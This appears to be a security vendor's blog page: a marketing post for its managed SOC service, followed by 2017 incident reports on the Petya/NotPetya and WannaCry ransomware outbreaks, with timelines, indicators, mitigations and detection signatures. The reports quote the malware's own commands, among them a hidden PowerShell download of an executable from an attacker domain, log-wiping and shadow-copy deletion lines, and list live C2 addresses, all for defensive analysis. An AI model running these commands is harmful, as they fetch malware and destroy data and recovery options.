GuidePoint leverages Splunk and Crowdstrike to automate critical security operations for customers

Find more than just an MSSP; find a partner

Today, organizations are scrambling to find managed security services providers (MSSPs) who can combat the shortage of qualified cybersecurity personnel available. Enterprises that have moved operational components of their security programs to MSSPs (e.g. management of on-premise or cloud-based Security Incident and Event Management Systems (SIEM)), often express disappointment with the value that typical MSSPs provide. Because most traditional MSSPs consider it their core function to forward alerts at a certain threshold to the customer for treatment, widespread complaints by organizations are growing – claiming that noise emanating from their MSSPs require as much manpower as managing their SIEM in-house. As such, these MSSPs are not adequately addressing the needs of their customers.

GuidePoint Security focuses its solution development on addressing these needs. Instead of reworking a failed model, GuidePoint brings Advanced Security Operations to our customers through a combination of best-in-class practices and technologies. Instead of simply forwarding alerts from customer SIEM environments, GuidePoint’s vSOC managed security service validates every alert to ensure that each threat is real. By doing so before taking further action or alerting our customers, customers save time and resources in tracking down false-positives.

Leveraging its partnership with CrowdStrike and Splunk, GuidePoint’s vSOC recently developed the capability to automate critical security operations functions including detection, hunting and remediation. Together, the advanced capabilities of both the Splunk platform and Crowdstrike’s Falcon Platform, allow customers to trust GuidePoint’s vSOC (and their skilled analysts) to alert them once an incident has been detected, validated and remediated. This practice offloads these processes from our customers’ security teams and allows them to focus on other tasks requiring their unique context and expertise, providing real value to our customers.

Interested in learning more? GuidePoint Security has a booth at .conf2017: the 8th Annual Splunk Conference, in Washington DC, Sept. 25-28th. Drop by and see us at the conference for a live Advanced SecOps demo.

Stay tuned for future blog posts on the coming solutions GuidePoint’s vSOC uses to provide customers with Advanced Security Operations – virtually.

About GuidePoint Security

GuidePoint Security LLC provides innovative and valuable cybersecurity solutions and expertise that enable organizations to successfully achieve their missions. By embracing new technologies, GuidePoint Security helps clients recognize the threats, understand the solutions, and mitigate the risks present in their evolving IT environments. Headquartered in Herndon, Virginia, GuidePoint Security is a small business, and classification is with the System for Award Management (SAM). Learn more at: www.guidepointsecurity.com.

Author

Robert Vaile – GuidePoint Security’s Director for vSOC Product Development

vSOC Spot Report – Petya – Ransomware Attack

Latest Updates

2017-06-27 18:31 EDT

As details continue to come in, there is evidence that today’s ransomware outbreak was actually two different campaigns that occurred at the same time. Some of the indicators originally attributed to the Petya malware were actually indicators belonging to the second campaign which is aptly being called, NotPetya.

Exploitation of the CVE-2017-0199 the myguys.xls file attachment, and the french-cooking[.]com domain name are all related to the NotPetya/Loki campaign which was a different kind of attack aimed at banking institutions.

GuidePoint’s vSOC reported on the Petya ransomware incident as events were unfolding. Due to our goal of reporting accurate information in a timely manner some of the original information included in our SPOT report and blog post was misattributed to the NotPetya/Loki campaign that was running simultaneously. The difference in these two campaigns was not known or understood initially. We have made every attempt to update this blog post with accurate information as it has been made available.

2017-06-27 17:55 EDT

Several different security researchers have identified a method of preventing the encryption of the disk by using any available method or technology to prevent C:\windows\perfc.dat from being written to disk or executed. This method does not stop the spread of the malware, just halts the encryption functions.

As of 1730 EDT the email provider for the attacker’s wowsmith123456@posteo.net email has closed the account. This affects the ability to pay the ransom if you are infected. New variants may provide a new method of payment.

2017-06-27 15:31 EDT

Connections to the initial outbreak of the Petya ransomware has been correlated to a compromised accounting software, MeDoc, popular with many large Ukrainian businesses as well as the Ukrainian Government. Attackers compromised the update code of a recent release which helped propagate the ransomware to many different companies. The update was released at 10:30AM GMT, about an hour before the initial surge of infections was observed.

2017-06-27 15:30 EDT

New information has been made available that provides further insight into how the Petya ransomware operates. If the permissions of the logged in user are not sufficient enough to write to the Master Boot Record (MBR) the malware will attempt to encrypt files based on their extension like more traditional ransomware.

The list of file types that are encrypted: 3ds, 7z, accdb, ai, asp, aspx, avhd, back, bak, c, cfg, conf, cpp, cs, ctl, dbf, disk, djvu, doc, docx, dwg, eml, fdb, gz, h, hdd, kdbx, mail, mdb, msg, nrg, ora, ost, ova, ovf, pdf, php, pmf, ppt, pptx, pst, pvi, py, pyc, rar, rtf, sln, sql, tar, vbox, vbs, vcb, vdi, vfd, vmc, vmdk, vmsd, vmx, vsdx, vsv, work, xls, xlsx, xvd, zip.

The malware also clears system security logs to prevent further analysis using the command:

wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D %c:

To further protect vulnerable systems it is advised to disallow the execution of the psexec.exe program if it is not needed or to disallow non-privileged users from executing psexec.exe via GPO or other endpoint mechanisms.

2017-06-27 15:20 EDT

Blocking lateral movement of the Petya variants of ransomware can be achieved by patching the EternalBlue vulnerability (Microsoft’s Critical Security Bulletin MS17-010) and by disabling Administrative Shares via Group Policy Object (GPO). To disable ADMIN$ shares use the below process:

Create a file named adminshares.adm with the content from below, under C:\windows\inf on the server you edit your GPO’s with.

CLASS MACHINE 
CATEGORY !!category1 
CATEGORY !!category2 
POLICY !!policyname 
EXPLAIN !!DefaultSharesExplain 
KEYNAME "System\CurrentControlSet\Services\LanManServer\Parameters\" 
VALUENAME "AutoShareWks" 
VALUEON NUMERIC 1 
VALUEOFF NUMERIC 0 
END POLICY 
END CATEGORY 
END CATEGORY 
[strings] 
category1="Network" 
category2="Sharing" 
policyname="AdministrativeShares" 
DefaultSharesExplain="Enables default workstation administrative shares if enabled or disables if disabled" 

 

Next, create a new GPO and right click on administrative templates, and add the administrative template you just created.

Click machine administrative templates, go into view filtering, unselect/uncheck “Only show policy settings that can be fully managed” the setting is shown in the top picture. Basically this allows the GPO Editor to show settings, that is not within the default area of registry “preferences” – like ours. Any settings done outside “preferences” will persist if the policy is removed, unlike standard policies.

Open Administrative Templates – Network – Sharing

Enable or disable administrative shares.

2017-06-27 14:11 EDT

On Tuesday June 27, 2017, accounts of a new ransomware campaign named Petya or Petwrap, are making headlines as infections hit Kiev, Ukraine at approximately 11:30 GMT and continued to spread throughout Russia, Spain, France, UK, India, and various other countries in Europe. The Petya ransomware variant does not encrypt individual files on an infected machine like WCrypt0r from May 2017. Rather, Petya reboots the computer and overwrites the Master Boot Record (MBR) in the boot sector of the hard drive with its code demanding ransom. Without the MBR, the operating system has no directions for where to find the files it needs to boot and run. This effectively renders the entire computer useless until the ransom, $300 in Bitcoin, is paid.

Today’s Petya variant infects machines through a Microsoft Office vulnerability (CVE-2017-0199) and then moves laterally throughout the network exploiting the EternalBlue SMBv1 file-sharing protocol vulnerability as described in Microsoft’s Critical Security Bulletin MS17-010. Patching these vulnerabilities is imperative and will significantly reduce or eliminate the ability of this ransomware to impact your organization.

The Petya ransomware first appeared in early 2016, but the variant spreading through Europe and Russia today contain new code and new functions. Most notable is the use of the EternalBlue exploit to infect machines. This variant is an evolution that has combined new tactics and procedures made famous in other malware campaigns seen in 2017.

Notable companies affected by the Petya ransomware attack include (at the time of this writing):

  • Danish Shipping Company, Maersk
  • British Advertising Company, WPP
  • Russian Oil Company, Rosneft
  • Ukrainian Power Companies, Kyivenergo and Ukrenergo
  • Ukrainian Banks, National Bank of Ukraine (NBU) and Oschadbank
  • Ukrainian Mining Company, Evraz
  • Ukrainian Telecomms, Kyivstar, LifeCell, and Ukrtelecom
  • Ukrainian Nuclear Power Plant, Chernobyl

At the time of publishing this vSOC SPOT Report, there have been no confirmed active connections to any of the known indicators associated with this Petya malware variant from any vSOC subscriber network.

vSOC has obtained rules for CarbonBlack and CrowdStrike to detect this infection; vSOC Protect clients with either of these solutions are protected and monitored for the Petya variants of ransomware. vSOC Detect clients are also being monitored for all available indicators of the Petya variants by your vSOC team.

Technical Analysis

Petya’s rapid propagation is believed to be linked to the use of the exact same EternalBlue exploit that the WanaCrypt0r malware used in May 2017; attacks against the vulnerable SMBv1 file-sharing protocol. EternalBlue was released to the public after being allegedly stolen from the National Security Agency (NSA) in April 2017.

Current evidence shows that these attacks began with malicious spam emails weaponized to use the EternalBlue exploit for Microsoft Office vulnerability CVE-2017-0199 over TCP ports 445, 135, and potentially 1024-1035.

Malicious emails originate from IPs 84.200.16.242, 95.141.115.108, 111.90.139.247, 185.165.29.78 which the attackers have registered to the domains delightcaf[.]xyz, french-cooking[.]com and coffeeinoffice[.]xyz.

The mal-spam variant of this attack is predominantly coming from 84.200.16.242/myguy[.]xls and 185.165.29.78/myguy[.]xls. All traffic to the Command and Control (C2) servers is currently using HTTP as the communication protocol.

Early reports indicate the botnet distributing this malware originates from the LokiBot network. Also, additional reports state the Mischa ransomware package is included in the Petya PE, however confirmation is still forthcoming.

Latest Indicators of Compromise

2017-06-127 15:20 EDT

File Names

These files are all accessed using the runtime process WINWORD.EXE (PID3008)

  • %APPDATA%\Microsoft\Office\Recent\Order-20062017.LNK
  • %APPDATA%\Microsoft\Office\Recent\index.dat
  • %APPDATA%\Microsoft\Templates\~$Normal.dotm
  • C:\~$der-20062017.doc@Please_Read_me@.txt
  • %LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\7N5LGTOO\myguy[1].hta
  • %LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1E328F26-90AD-432F-85D6-72D24D3FC842}.tmp
  • %LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8C06767A-F061-47F9-B88B-16AA8AA0D1F2}.tmp

Command and Control (C2)

  • 200.16.242/myguy[.]xls
  • 165.29.78/myguy[.]xls

Memory Strings

  • !”#$%&'()*+,-./0123456789:;<=>
  • “$(*.046:<“j.x\
  • (\{9%EZ”B%]V\XR){y%JWbj3jiDN}~Hl:x7
  • )|xA:X+Zp@w>v)7#% M+ANqR#mXf,934 qx$}&
  • /myguy.xls
  • /n “C:\Order-20062017.doc”
  • 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000105000000000000}}
  • 0000320a5802580201000400000000005202bc0220003600050000000902000000021c000000fb021000070000000000bc02000000000102022253797374656d0076f8032f0040311500bf05087640910b76fc7cb3044c311500040000002d010500040000002d01050004000000f0010300030000000000}{\result {
  • 1Pm\\9M2aD];Yt\[x]}Wr|]g-
  • 6iD_,|uZ^ty;!Y,}{C/h> PK ! dQ 1 word/_rels/document.xml.rels ( j0{-;@ $~

File Hash Values

  • 185.165.29.78
    • A809a63bc5e31670ff117d838522dc433f74bee
    • 078de2dc59ce59f503c63bd61f1ef8353dc7cf5f
    • bec678164cedea578a7aff4589018fa41551c27f
    • d5bf3f100e7dbcc434d7c58ebf64052329a60fc2
    • aba7aa41057c8a6b184ba5776c20f7e8fc97c657
    • 0ff07caedad54c9b65e5873ac2d81b3126754aac
    • 51eafbb626103765d3aedfd098b94d0e77de1196
  • 84.200.16.242
    • 7ca37b86f4acc702f108449c391dd2485b5ca18c
    • 2bc182f04b935c7e358ed9c9e6df09ae6af47168
    • 1b83c00143a1bb2bf16b46c01f36d53fb66f82b5
    • 82920a2ad0138a2a8efc744ae5849c6dde6b435d

Binary Details

The binary is currently signed using a certificate from Sysinternals. This will give a Certificate Name Mismatch error; however, the binary will still run in Windows. The current samples attempt to hijack an authorized session in order to spread using psexec. Several of the samples show the lateral movement functions are utilizing Windows Management Instrumentation Command-line (WMIC). Both are avenues for the malware to gain either local or Domain Administrator privileges allowing it to spread using that level of credential.

The sample was compiled for the i386 architecture specifically but appears to be functional on x64 architecture as well.

The PE imports the following DLL files for proper execution:

  • ADVAPI32.dll
  • CRYPT32.dll
  • DHCPSAPI.DLL
  • IPHLPAPI.DLL
  • KERNEL32.dll
  • MPR.dll
  • NETAPI32.dll
  • SHELL32.dll
  • SHLWAPI.dll
  • USER32.dll
  • WS2_32.dll
  • msvcrt.dll
  • ole32.dll

Powershell

The PE will attempt to execute the following script:

PowerShell -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile(‘http://french-cooking.com/myguy.exe’, ‘%APPDATA%\<random>.exe’)

The <random> variable is a random number between 0-65535, which it will then call with the arguments 1  0 (For example %APPDATA%\10254.exe 1 0).

Additional files dropped:

  • http[:]//185.165.29.78/~alex/svchost.exe

Extortioner Contact Info:

Mitigation

vSOC recommends immediately patching the vulnerabilities described in CVE-2017-0199  and MS17-010. However, unlike the previous WCrypt0r ransomware, patching alone will not prevent the spread of this malware. Petya’s code will attempt to use a variety of methods to propagate itself including the EternalBlue vulnerability, WMIC, and Powershell.

vSOC recommends that organizations:

References:

vSOC SPOT Report – WCrypt (WanaCrypt0r 2.0) – Ransomware Attack

Latest Updates

2017-05-14 10:08 EDT

Researchers are reporting that a new variant of the WannaCrypt malware has been observed in the wild notably missing the kill switch check for the www.Iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com domain that @MalwareTechLab registered to stop the first variant from propagating as fast. It has been speculated that the kill switch was actually a poorly implemented check to see if the malware was running in a sandbox. Even variants with the kill switch can continue to propagate and infect vulnerable networks through phishing emails or other lateral movement capabilities.

It is imperative that all Windows systems be patched. Microsoft released an out-of-band patch for deprecated operating systems to include Windows XP and Server 2003 Saturday to help thwart this campaign. vSOC will remain diligent in monitoring all client environments for signs of compromise or infection.

GuidePoint recommends disabling SMBv1 using a GPO or PowerShell script:

Via GPO

To enable or disable SMBv1 on the SMB server, configure the following registry key (a reboot is required):

Registry subkey: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\ParametersRegistry entry: SMB1
REG_DWORD: 0 = Disabled
REG_DWORD: 1 = Enabled
Default: 1 = Enabled
To enable or disable SMBv2 on the SMB server, configure the following registry key:
Registry subkey:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\ParametersRegistry entry: SMB2
REG_DWORD: 0 = Disabled
REG_DWORD: 1 = Enabled
Default: 1 = Enabled

Via PowerShell

To disable SMBv1 on the SMB server, run the following cmdlet:

Set-ItemProperty -Path “HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters” SMB1 -Type DWORD -Value 0 -Force

To enable SMBv2 and SMBv3 on the SMB server, run the following cmdlet:

Set-ItemProperty -Path “HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters” SMB2 -Type DWORD -Value 1 -Force

2017-05-12 22:28 EDT

A UK malware researcher whose Twitter handle is @MalwareTechLab “accidentally” stopped one wide-spread variant of the ransomware from propagating further by registering a domain discovered while analyzing the code. The domain, Iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com is a kill switch that the code sends a GET request for. If the domain is not found, the code continues and infects the host. If the domain is found the code exits and the host is not infected. As long as the domain does not get revoked or taken down, this particular variant will cease infecting new machines. New variants are likely to spring up in the coming days and weeks without this kill switch feature, so due diligence is highly recommended along with patching all vulnerable systems and disabling SMB v1.

Based on this latest information, GuidePoint recommends our original mitigation steps:

  • All systems be updated to the latest patch available from Microsoft. The patch specific to the exploit kit is labeled KB4012598 or MS17-010 and should be evaluated for deployment immediately if it has not already been applied. This will prevent the SMB traffic from exploiting the vulnerability, and eliminates initial infection vectors.
  • Application whitelisting be applied to prevent any applications from running which are not from a specified location or signed by the whitelisted vendor.
  • You create and maintain offline backups of critical data which will reduce the amount of damage a crypto- ransomware attack is capable of inflicting.
  • You ensure your antivirus definitions are up to date. Most major anti-virus vendors have been provided samples of this malware and have developed detections and definitions. Currently, approximately 31 out of 60 A/V vendors tested can recognize and stop this infection. Major vendors not included in the list include Symantec and Sophos.

Latest Indicators of Compromise

2017-05-12 22:36 EDT

File Names

  • mssecsvc.exe
  • @wanadecryptor@.exe
  • taskdl.exe
  • taskse.exe
  • tasksche.exe
  • tor.exe
  • @Please_Read_me@.txt

File Extensions

  • .wcry
  • .wncry
  • .wncryt
  • .wncy

Windows Service Name

  • mssecsvc2.0
  • Microsoft Security Center (2.0) Service

File Strings

  • Wanna Decryptor 1.0
  • Wana DecryptOr
  • Wana Decrypt0r
  • WANNACRY
  • WanaCryptOr
  • WanaCrypt0r
  • WANACRY!
  • WNcry@2o17

File Hash Values

  • ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa
  • c365ddaa345cfcaff3d629505572a484cff5221933d68e4a52130b8bb7badaf9
  • 09a46b3e1be080745a6d8d88d6b5bd351b1c7586ae0dc94d0c238ee36421cafa
  • 0a73291ab5607aef7db23863cf8e72f55bcb3c273bb47f00edf011515aeb5894
  • 428f22a9afd2797ede7c0583d34a052c32693cbb55f567a60298587b6e675c6f
  • 5c1f4f69c45cff9725d9969f9ffcf79d07bd0f624e06cfa5bcbacd2211046ed6
  • 62d828ee000e44f670ba322644c2351fe31af5b88a98f2b2ce27e423dcf1d1b1
  • 72af12d8139a80f317e851a60027fdf208871ed334c12637f49d819ab4b033dd
  • 85ce324b8f78021ecfc9b811c748f19b82e61bb093ff64f2eab457f9ef19b186
  • a1d9cd6f189beff28a0a49b10f8fe4510128471f004b3e4283ddc7f78594906b
  • a93ee7ea13238bd038bcbec635f39619db566145498fe6e0ea60e6e76d614bd3
  • b43b234012b8233b3df6adb7c0a3b2b13cc2354dd6de27e092873bf58af2693c
  • eb47cd6a937221411bb8daf35900a9897fb234160087089a064066a65f42bcd4
  • 24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c
  • 2c2d8bc91564050cf073745f1b117f4ffdd6470e87166abdfcd10ecdff040a2e
  • 7a828afd2abf153d840938090d498072b7e507c7021e4cdd8c6baf727cafc545
  • a897345b68191fd36f8cefb52e6a77acb2367432abb648b9ae0a9d708406de5b
  • fb0b6044347e972e21b6c376e37e1115dab494a2c6b9fb28b92b1e45b45d0ebc
  • 9588f2ef06b7e1c8509f32d8eddfa18041a9cc15b1c90d6da484a39f8dcdf967
  • b43b234012b8233b3df6adb7c0a3b2b13cc2354dd6de27e092873bf58af2693c
  • 4186675cb6706f9d51167fb0f14cd3f8fcfb0065093f62b10a15f7d9a6c8d982
  • 2584e1521065e45ec3c17767c065429038fc6291c091097ea8b22c8a502c41dd
  • 2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d
  • 4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79

Command and Control IP’s:

  • 188.166.23.127:443
  • 193.23.244.244:443
  • 2.3.69.209:9001
  • 50.7.161.218:9001
  • 217.79.179.77
  • 128.31.0.39
  • 213.61.66.116
  • 212.47.232.237
  • 81.30.158.223
  • 79.172.193.32
  • 89.45.235.21
  • 38.229.72.16
  • 188.138.33.220
  • 146.0.32.144:9001
  • 188.166.23.127:443
  • 193.23.244.244:443

Sender IPs:

  • 205.186.153.200
  • 96.127.190.2
  • 184.154.48.172
  • 200.58.103.166
  • 216.145.112.183
  • 162.220.58.39
  • 192.237.153.208
  • 146.0.32.144
  • 188.166.23.127
  • 50.7.161.218
  • 2.3.69.209
  • 74.125.104.145
  • 75.126.5.21

Tor Onion URL’s:

  • 57g7spgrzlojinas.onion
  • 76jdd2ir2embyv47.onion
  • cwwnhwhlz52maqm7.onion
  • gx7ekbenv2riucmf.onion
  • sqjolphimrr7jqw6.onion
  • Xxlvbrloxvriy2c5.onion

Mutex:

  • ShimCacheMutex
  • Global\MsWinZonesCacheCounterMutexA0
  • MsWinZonesCacheCounterMutexA

Domains:

  • R12.sn-h0j7sn7s.gvt1.com
  • Iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com

Email Sender:

  • alertatnb@serviciobancomer.com

Kill Switch Domain:

  • www.Iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com

Snort Signatures:

alert tcp $HOME_NET 445 -> any any (msg:”ET EXPLOIT Possible ETERNALBLUE MS17-010 Echo Response”; flow:from_server,established; content:”|00 00 00 31 ff|SMB|2b 00 00 00 00 98 07 c0|”; depth:16; fast_pattern; content:”|4a 6c 4a 6d 49 68 43 6c 42 73 72 00|”; distance:0; flowbits:isset,ETPRO.ETERNALBLUE; classtype:trojan-activity; sid:2024218; rev:2;)

alert smb any any -> $HOME_NET any (msg:”ET EXPLOIT Possible ETERNALBLUE MS17-010 Heap Spray”; flow:to_server,established; content:”|ff|SMB|33 00 00 00 00 18 07 c0 00 00 00 00 00 00 00 00 00 00 00 00 00|”; offset:4; depth:25; content:”|08 ff fe 00 08 41 00 09 00 00 00 10|”; within:12; fast_pattern; content:”|00 00 00 00 00 00 00 10|”; within:8; content:”|00 00 00 10|”; distance:4; within:4; pcre:”/^[a-zA-Z0-9+/]{1000,}/R”; threshold: type threshold, track by_src, count 12, seconds 1; classtype:trojan-activity; sid:2024217; rev:1;)

alert smb any any -> $HOME_NET any (msg:”ET EXPLOIT Possible ETERNALBLUE MS17-010 Echo Request (set)”; flow:to_server,established; content:”|00 00 00 31 ff|SMB|2b 00 00 00 00 18 07 c0|”; depth:16; fast_pattern; content:”|4a 6c 4a 6d 49 68 43 6c 42 73 72 00|”; distance:0; flowbits:set,ETPRO.ETERNALBLUE; flowbits:noalert; classtype:trojan-activity; sid:2024220; rev:1;)

alert smb $HOME_NET any -> any any (msg:”ET EXPLOIT Possible ETERNALBLUE MS17-010 Echo Response”; flow:from_server,established; content:”|00 00 00 31 ff|SMB|2b 00 00 00 00 98 07 c0|”; depth:16; fast_pattern; content:”|4a 6c 4a 6d 49 68 43 6c 42 73 72 00|”; distance:0; flowbits:isset,ETPRO.ETERNALBLUE; classtype:trojan-activity; sid:2024218; rev:1;)
http://docs.emergingthreats.net/bin/view/Main/2024218

The ransomware encrypts files with the following extensions:

.der, .pfx, .key, .crt, .csr, .p12, .pem, .odt, .ott, .sxw, .stw, .uot, .3ds, .max, .3dm, .ods, .ots, .sxc, .stc, .dif, .slk, .wb2, .odp, .otp, .sxd, .std, .uop, .odg, .otg, .sxm, .mml, .lay, .lay6, .asc, .sqlite3, .sqlitedb, .sql, .accdb, .mdb, .dbf, .odb, .frm, .myd, .myi, .ibd, .mdf, .ldf, .sln, .suo, .cpp, .pas, .asm, .cmd, .bat, .ps1, .vbs, .dip, .dch, .sch, .brd, .jsp, .php, .asp, .java, .jar, .class, .mp3, .wav, .swf, .fla, .wmv, .mpg, .vob, .mpeg, .asf, .avi, .mov, .mp4, .3gp, .mkv, .3g2, .flv, .wma, .mid, .m3u, .m4u, .djvu, .svg, .psd, .nef, .tiff, .tif, .cgm, .raw, .gif, .png, .bmp, .jpg, .jpeg, .vcd, .iso, .backup, .zip, .rar, .tgz, .tar, .bak, .tbk, .bz2, .PAQ, .ARC, .aes, .gpg, .vmx, .vmdk, .vdi, .sldm, .sldx, .sti, .sxi, .602, .hwp, .snt, .onetoc2, .dwg, .pdf, .wk1, .wks, .123, .rtf, .csv, .txt, .vsdx, .vsd, .edb, .eml, .msg, .ost, .pst, .potm, .potx, .ppam, .ppsx, .ppsm, .pps, .pot, .pptm, .pptx, .ppt, .xltm, .xltx, .xlc, .xlm, .xlt, .xlw, .xlsb, .xlsm, .xlsx, .xls, .dotx, .dotm, .dot, .docm, .docb, .docx, .doc

Once started it immediately spawns several processes to change file permissions and communicate with tor hidden c2 servers:

attrib +h .
icacls . /grant Everyone:F /T /C /Q
C:\Users\xxx\AppData\Local\Temp\taskdl.exe
@WanaDecryptor@.exe fi
300921484251324.bat
C:\Users\xxx\AppData\Local\Temp\taskdl.exe
C:\Users\xxx\AppData\Local\Temp\taskdl.exe
The malware creates mutex “Global\MsWinZonesCacheCounterMutexA” and runs the command:
cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

Files:

  • [Installed_Folder]\00000000.eky
  • [Installed_Folder]\00000000.pky
  • [Installed_Folder]\00000000.res
  • [Installed_Folder]\@WanaDecryptor@.exe
  • [Installed_Folder]\@WanaDecryptor@.exe.lnk
  • [Installed_Folder]\b.wnry
  • [Installed_Folder]\c.wnry
  • [Installed_Folder]\f.wnry
  • [Installed_Folder]\msg\
  • [Installed_Folder]\msg\m_bulgarian.wnry
  • [Installed_Folder]\msg\m_chinese (simplified).wnry
  • [Installed_Folder]\msg\m_chinese (traditional).wnry
  • [Installed_Folder]\msg\m_croatian.wnry
  • [Installed_Folder]\msg\m_czech.wnry
  • [Installed_Folder]\msg\m_danish.wnry
  • [Installed_Folder]\msg\m_dutch.wnry
  • [Installed_Folder]\msg\m_english.wnry
  • [Installed_Folder]\msg\m_filipino.wnry
  • [Installed_Folder]\msg\m_finnish.wnry
  • [Installed_Folder]\msg\m_french.wnry
  • [Installed_Folder]\msg\m_german.wnry
  • [Installed_Folder]\msg\m_greek.wnry
  • [Installed_Folder]\msg\m_indonesian.wnry
  • [Installed_Folder]\msg\m_italian.wnry
  • [Installed_Folder]\msg\m_japanese.wnry
  • [Installed_Folder]\msg\m_korean.wnry
  • [Installed_Folder]\msg\m_latvian.wnry
  • [Installed_Folder]\msg\m_norwegian.wnry
  • [Installed_Folder]\msg\m_polish.wnry
  • [Installed_Folder]\msg\m_portuguese.wnry
  • [Installed_Folder]\msg\m_romanian.wnry
  • [Installed_Folder]\msg\m_russian.wnry
  • [Installed_Folder]\msg\m_slovak.wnry
  • [Installed_Folder]\msg\m_spanish.wnry
  • [Installed_Folder]\msg\m_swedish.wnry
  • [Installed_Folder]\msg\m_turkish.wnry
  • [Installed_Folder]\msg\m_vietnamese.wnry
  • [Installed_Folder]\r.wnry
  • [Installed_Folder]\s.wnry
  • [Installed_Folder]\t.wnry
  • [Installed_Folder]\TaskData\
  • [Installed_Folder]\TaskData\Data\
  • [Installed_Folder]\TaskData\Data\Tor\
  • [Installed_Folder]\TaskData\Tor\
  • [Installed_Folder]\TaskData\Tor\libeay32.dll
  • [Installed_Folder]\TaskData\Tor\libevent-2-0-5.dll
  • [Installed_Folder]\TaskData\Tor\libevent_core-2-0-5.dll
  • [Installed_Folder]\TaskData\Tor\libevent_extra-2-0-5.dll
  • [Installed_Folder]\TaskData\Tor\libgcc_s_sjlj-1.dll
  • [Installed_Folder]\TaskData\Tor\libssp-0.dll
  • [Installed_Folder]\TaskData\Tor\ssleay32.dll
  • [Installed_Folder]\TaskData\Tor\taskhsvc.exe
  • [Installed_Folder]\TaskData\Tor\tor.exe
  • [Installed_Folder]\TaskData\Tor\zlib1.dll
  • [Installed_Folder]\taskdl.exe
  • [Installed_Folder]\taskse.exe
  • [Installed_Folder]\u.wnry
  • [Installed_Folder]\wcry.exe

Registry Entries:

  • HKCU\Software\Microsoft\Windows\CurrentVersion\Run\[random] “[Installed_Folder]\tasksche.exe
  • HKCU\Software\WanaCrypt0r\
  • HKCU\Software\WanaCrypt0r\wd [Installed_Folder]
  • HKCU\Control Panel\Desktop\Wallpaper “[Installed_Folder]\Desktop\@WanaDecryptor@.bmp”

Email Subjects:

  • FILE_<5 numbers>
  • SCAN_<5 numbers>
  • PDF_<4 or 5 numbers>

Email Attachment:

  • nm.pdf

Surricata SIgnatures (https://github.com/xNymia/Suricata-Signatures/blob/master/EquationGroup.rules):

# EternalBlue Signature matching potential NEW installation of SMB payloadalert tcp $HOME_NET any -> any any (msg:”EXPLOIT Possible Successful ETERNALBLUE Installation SMB MultiplexID = 82 – MS17-010″; flow:from_server,established; content:”|FF|SMB|32 02 00 00 c0|”; offset:4; depth:9; content:”|52 00|”; distance:21; within:23; classtype:trojan-activity; sid:5000072; rev:1;)

# EternalBlue Signature matching return signature for connection to pre-installed SMB payloadalert tcp $HOME_NET any -> any any (msg:”EXPLOIT Successful ETERNALBLUE Connection SMB MultiplexID = 81 – MS17-010″; flow:from_server,established; content:”|FF|SMB|32 02 00 00 c0|”; offset:4; depth:9; content:”|51 00|”; distance:21; within:23; classtype:trojan-activity; sid:5000073; rev:1;)

# Signature to identify what appears to be initial setup trigger for SMBv1 – MultiplexID 64 is another unusual valuealert tcp $HOME_NET any -> any any (msg:”EXPLOIT Possible ETERNALBLUE SMB Exploit Attempt Stage 1/2 – Tree Connect AndX MultiplexID = 64 – MS17-010″; flow:to_server,established; content:”|FF|SMB|75 00 00 00 00|”; offset:4; depth:9; content:”|40 00|”; distance:21; within:23; flowbits: set, SMB.v1.AndX.MID.64; classtype:trojan-activity; sid:5000074; rev:1;)

# Signature triggers on Trans2 Setup Request with MultiplexID – 65 – Another unusual MID – Only triggers if 64 was seen previously. alert tcp $HOME_NET any -> any any (msg:”EXPLOIT Possible ETERNALBLUE SMB Exploit Attempt Stage 2/2 – Trans2 SUCCESS MultiplexID = 65 – MS17-010″; flow:to_server,established; content:”|FF|SMB|32 00 00 00 00|”; offset:4; depth:9;

Overview

On Friday, May 12th, an attack being made against the United Kingdom National Health Service (NHS) and the Spain- based telecommunications company, Telefonica, was made public. Reports now show that both companies have been hit with the WCrypt (WanaCrypt0r 2.0) crypto-ransomware. This attack is being perpetrated through the use of the recently leaked Eternal Blue exploit, belonging to the exploit kits released by the ShadowBrokers dump from the compromise of the National Security Agency (NSA). This exploit has been weaponized as a worm using a previously unpatched SMB vulnerability. This exploit has verified infections in the US as well. While data is still filtering in, early reports indicate FedEx is among the first US businesses compromised.

WCrypt Data

WCrypt is a standard crypto-ransomware which, once on the user’s system, encrypts the user’s files with the threat of deletion of the encryption keys if the user does not pay the ransom within seven days. With this variant, the ransom is demanded within 3 days or the ransom amount doubles, and within 7 days if the ransom isn’t paid, the encryption keys are deleted rendering all encrypted data unrecoverable.

Recognizing WCrypt Infections

The infection stems from a file named: wannacry.exe. The Hashes are located below:

SHA256:

  • 2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d
  • 4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79
  • 09a46b3e1be080745a6d8d88d6b5bd351b1c7586ae0dc94d0c238ee36421cafa
  • 24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c
  • 2584e1521065e45ec3c17767c065429038fc6291c091097ea8b22c8a502c41dd

SHA1:

  • 45356a9dd616ed7161a3b9192e2f318d0ab5ad10
  • 51e4307093f8ca8854359c0ac882ddca427a813c

MD5:

  • 509c41ec97bb81b0567b059aa2f50fe8
